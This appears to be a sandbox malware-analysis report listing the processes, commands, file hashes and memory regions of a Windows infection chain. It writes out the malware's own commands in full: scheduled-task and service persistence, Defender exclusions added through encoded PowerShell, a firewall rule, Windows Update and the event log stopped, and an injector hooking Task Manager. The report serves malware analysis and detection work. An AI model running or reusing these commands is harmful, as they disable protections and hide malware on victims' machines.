C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 636

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 768

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 888

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 904

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 984

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\1000560001\kskskfsf.exe

"C:\Users\Admin\AppData\Local\Temp\1000560001\kskskfsf.exe"

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 896

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 876 -ip 876

C:\Users\Admin\AppData\Local\Temp\nsfA097.tmp

C:\Users\Admin\AppData\Local\Temp\nsfA097.tmp

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 616

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4880 -ip 4880

C:\Users\Admin\AppData\Local\Temp\toolspub1.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"

C:\Users\Admin\AppData\Local\Temp\1000563001\pixellslsss.exe

"C:\Users\Admin\AppData\Local\Temp\1000563001\pixellslsss.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2820 -ip 2820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2820 -ip 2820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 692

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 692

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2820 -ip 2820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2820 -ip 2820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 712

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2820 -ip 2820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2820 -ip 2820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2820 -ip 2820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2820 -ip 2820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 356

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 336

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2820 -ip 2820

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe

"C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe

"C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\xfAk7rC2FeEN35Y8o.exe

"xfAk7rC2FeEN35Y8o.exe"

C:\Windows\system32\attrib.exe

attrib +H "xfAk7rC2FeEN35Y8o.exe"

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 728

C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe

"C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe"

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 784

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2528 -ip 2528

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 804

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 768

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 768

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2528 -ip 2528

C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe

"C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe"

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_8.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_9.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p4632370330209207692137030328 -oextracted

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 644

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\timeout.exe

timeout /t 5

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1084 -s 2420

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1084 -ip 1084

C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe

"C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsfA097.tmp" & del "C:\ProgramData\*.dll"" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2528 -ip 2528

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 892

C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe

"C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 612

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe

"C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 972

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "FLWCUERA"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "FLWCUERA" binpath= "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe" start= "auto"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "FLWCUERA"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe

C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

conhost.exe

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 648

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 956

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 1068

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "WSNKISKT"

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "WSNKISKT"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMAA1ADcAMQAwADAAMQBcAEcAegB4AHoAdQBoAGUAagBkAGEAYgAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAARwB6AHgAegB1AGgAZQBqAGQAYQBiAC4AZQB4AGUAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABrAGoAaABrAGgAawBoAGsALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAGsAagBoAGsAaABrAGgAawAuAGUAeABlAA==

C:\ProgramData\wikombernizc\reakuqnanrkn.exe

C:\ProgramData\wikombernizc\reakuqnanrkn.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C powershell -EncodedCommand "PAAjADUAVQBDACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBwAEIASwB1AEUAVwA1AHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAVQBtAGIAbgBvAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBhADEAbAAzADIAWgBtAFMASAB1ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjADUAVQBDACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBwAEIASwB1AEUAVwA1AHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAVQBtAGIAbgBvAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBhADEAbAAzADIAWgBtAFMASAB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6900" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe

C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 1148

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 1164

Network


Files


memory/2772-43-0x00000000051D0000-0x00000000052CC000-memory.dmp

memory/2772-44-0x00000000051D0000-0x00000000052C7000-memory.dmp

memory/2772-45-0x00000000051D0000-0x00000000052C7000-memory.dmp

memory/2772-53-0x00000000051D0000-0x00000000052C7000-memory.dmp

memory/2772-65-0x00000000051D0000-0x00000000052C7000-memory.dmp

memory/2772-69-0x00000000051D0000-0x00000000052C7000-memory.dmp

memory/2772-71-0x00000000051D0000-0x00000000052C7000-memory.dmp

memory/2772-85-0x00000000051D0000-0x00000000052C7000-memory.dmp

memory/2772-91-0x00000000051D0000-0x00000000052C7000-memory.dmp

memory/2772-95-0x00000000051D0000-0x00000000052C7000-memory.dmp

memory/2772-101-0x00000000051D0000-0x00000000052C7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000545001\gold1234.exe

MD5 82bbbf082f9f694ba643d08571ee6600
SHA1 b3f410bec583f82b571af6da3e9712a0face47b5
SHA256 0f43bfb66b41f33c96611d09c326a98fd101714355ab9845d753bd0ed6246ec3
SHA512 ee81b0a42e88a937ca2fa40b8c7d3a48c78e3caf3e2739bf3103b73196757572868302eeb5a7dc542fb0e7aa3ebf09c0783b2c7d9b52d63cee1111f385de2119

memory/2772-103-0x00000000051D0000-0x00000000052C7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000545001\gold1234.exe

MD5 71268456c5e7f3c233caf9b10557fdc6
SHA1 5bd9426bd7a105613d1ad3f69f0b7917f8e9e514
SHA256 9e1bcb94f5f7f7eecfb13959d2676d04e17483638a23dec48381efbffe2015be
SHA512 9b6bbe4cc8dc232d874bf19af23b76c9fed595660ae68d7afd666e58dbf938a306015493c8c17c5b6b8fc9e447b01d4fcc554acd7e1513946c01c66875283c51

memory/2092-135-0x0000000073520000-0x0000000073CD0000-memory.dmp

memory/2092-133-0x0000000000D40000-0x0000000000DA4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000545001\gold1234.exe

MD5 1bd0f35b3103ff0a27e0e24929e337b8
SHA1 d60212a74e177d366e1cb8687b87e5aff3333816
SHA256 cbf70ebebe929a6d91babdc68271d8dff7f55e1ae0ea184abffd1de8393b26f5
SHA512 98cec282ec71144ce04736a4e3c46eb1adcf7c0dbbbcc213cb01818120cb2bc379e8d17f4f9cd0f69fd7e2bd7636e6b87745833febc21939ee7bdedd1837d0e6

memory/2772-99-0x00000000051D0000-0x00000000052C7000-memory.dmp

memory/2092-143-0x00000000057D0000-0x00000000057E0000-memory.dmp

memory/2772-97-0x00000000051D0000-0x00000000052C7000-memory.dmp

memory/2772-93-0x00000000051D0000-0x00000000052C7000-memory.dmp

memory/2772-89-0x00000000051D0000-0x00000000052C7000-memory.dmp

memory/2772-87-0x00000000051D0000-0x00000000052C7000-memory.dmp

memory/2772-83-0x00000000051D0000-0x00000000052C7000-memory.dmp

memory/2092-154-0x0000000003120000-0x0000000005120000-memory.dmp

memory/1956-161-0x0000000073520000-0x0000000073CD0000-memory.dmp

memory/1956-163-0x0000000005530000-0x00000000055C2000-memory.dmp

memory/1956-158-0x0000000005A00000-0x0000000005FA4000-memory.dmp

memory/1956-170-0x00000000056E0000-0x00000000056EA000-memory.dmp

memory/1956-168-0x00000000054C0000-0x00000000054D0000-memory.dmp

memory/2092-159-0x0000000073520000-0x0000000073CD0000-memory.dmp

memory/1956-152-0x0000000000400000-0x0000000000454000-memory.dmp

memory/2772-81-0x00000000051D0000-0x00000000052C7000-memory.dmp

memory/1956-194-0x00000000083B0000-0x00000000084BA000-memory.dmp

memory/1956-196-0x00000000082A0000-0x00000000082B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe

MD5 72496928b76698fbc0daa6ba967c5cec
SHA1 937db253a38cddc54d57a8629536f4f48978bcc0
SHA256 8fe80cea206dae1c3bd945b16b02d5911b3d073d624fd141bab8e2d0276b14f4
SHA512 6c9e5c11503d109aab877ca688278c0cf3624a49e1d42a57895547ce70e1931fa81d44e60f0b805aca35fe38e368ed6fb4a631472a49bb8631beb0f7fe3271e1

memory/1956-208-0x0000000008300000-0x000000000833C000-memory.dmp

memory/1956-214-0x0000000008350000-0x000000000839C000-memory.dmp

memory/1956-191-0x0000000006A20000-0x0000000007038000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe

